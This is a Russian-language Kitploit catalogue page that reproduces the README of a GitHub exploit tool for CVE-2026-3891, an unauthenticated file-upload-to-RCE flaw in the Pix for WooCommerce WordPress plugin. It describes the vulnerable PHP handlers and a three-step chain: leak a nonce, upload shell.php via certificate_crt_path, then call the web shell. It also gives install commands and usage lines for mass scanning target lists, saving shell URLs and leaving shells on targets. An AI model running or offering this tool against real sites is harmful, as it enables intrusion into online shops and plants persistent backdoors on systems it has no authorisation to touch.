Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-3891 — Pix for WooCommerce — Неаутентифицированная загрузка файла через параметр certificate_crt_path | CVSS 9.8 | Kitploit
Инструменты/GitHubGitHub/shinthink/cve-2026-3891
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubshinthink/cve-2026-3891

CVE-2026-3891

Pix for WooCommerce — Неаутентифицированная загрузка файла через параметр certificate_crt_path | CVSS 9.8

Репозиторий
4121 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-3891 — Pix for WooCommerce Unauthenticated File Upload RCE

Утечка Nonce → Загрузка certificate_crt_path → Выполнение кода


Обзор

CVE-2026-3891 — это критическая (CVSS 9.8) уязвимость неавторизованной произвольной загрузки файлов в WordPress-плагине Pix for WooCommerce (от linknacional) версий ≤ 1.5.0.

Обработчик AJAX lkn_pix_for_woocommerce_c6_save_settings имеет:

  1. Отсутствие проверки прав — любой неавторизованный посетитель может его вызвать
  • Отсутствие проверки типа файла — через параметр certificate_crt_path принимается любое расширение
  • Действительный nonce свободно получается через конечную точку lkn_pix_for_woocommerce_generate_nonce без аутентификации
  • Загруженные файлы попадают в веб-доступную директорию /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/.

    Затронутые версии

    ВерсияСтатус
    ≤ 1.5.0Уязвима
    1.6.0+Исправлена

    Обнаружил: Alexis Lafontaine через Wordfence (13 марта 2026)


    Механизм уязвимости

    Первопричина

    root@kitploit:~
    // Nonce генерируется без аутентификации
    add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);
    
    // Обработчик загрузки — нет проверки прав, нет проверки типа файла
    add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
    function c6_save_settings() {
        // Нет проверки current_user_can()
        // Нет вызова wp_check_filetype()
        move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
    }
    

    Схема атаки

    root@kitploit:~
    1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
       → Получить валидный nonce (аутентификация не требуется)
    2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
       → Загрузить shell.php через поле certificate_crt_path
    3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
       → RCE
    

    Установка

    root@kitploit:~
    git clone https://github.com/shinthink/CVE-2026-3891.git
    cd CVE-2026-3891
    pip install -r requirements.txt
    

    Использование

    root@kitploit:~
    python cve_2026_3891.py -t target.com
    python cve_2026_3891.py -f targets.txt -o shells.txt
    python cve_2026_3891.py -t target.com --debug --no-cleanup
    

    Аргументы

    root@kitploit:~
      -t, --target      Одиночная цель
      -f, --file        Список целей
      -o, --output      Сохранить URL-адреса RCE
      --threads         Количество потоков (по умолчанию: 30)
      --no-cleanup      Оставить шеллы на цели
      --debug           Показывать каждый запрос
      -v, --verbose     Подробный вывод
    

    Отказ от ответственности

    ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И АВТОРИЗОВАННЫХ ТЕСТОВ. Авторы не несут ответственности за неправомерное использование.


    Ссылки

    РесурсСсылка
    Уведомление Wordfencewordfence.com
    Запись NVDCVE-2026-3891
    ИсследовательAlexis Lafontaine

    Не связано с linknacional или Pix for WooCommerce.

    Скачать инструмент